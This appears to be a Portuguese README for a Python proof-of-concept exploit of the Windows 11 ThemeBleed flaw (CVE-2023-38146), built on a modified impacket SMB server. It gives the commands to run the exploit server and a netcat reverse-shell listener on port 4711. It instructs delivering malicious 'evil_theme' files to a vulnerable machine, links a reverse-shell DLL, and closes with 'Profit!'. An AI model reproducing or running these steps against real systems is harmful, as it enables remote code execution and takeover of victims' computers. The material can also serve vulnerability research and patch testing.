
PoC para o ThemeBleed do Windows 11 CVE-2023-38146 escrito em python usando impacket. https://jnns.de/posts/cve-2023-38146-poc/
Fortemente inspirado por https://github.com/gabe-k/themebleed que só roda no Windows (a razão pela qual decidi escrever isto).
Usei código modificado do impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Coisas úteis: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Post do blog: https://jnns.de/posts/cve-2023-38146-poc/
Instale os requisitos e execute a aplicação:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Use o "evil_theme.theme" ou "evil_theme.themepack" em uma máquina vulnerável.
Lucro!
Coloque uma DLL com uma função exportada "VerifyThemeVersion" na pasta "./td/", com o nome "Aero.msstyles_vrf_evil.dll". Você deve conseguir encontrar uma DLL de exemplo usando o Google ou usar meu exemplo https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711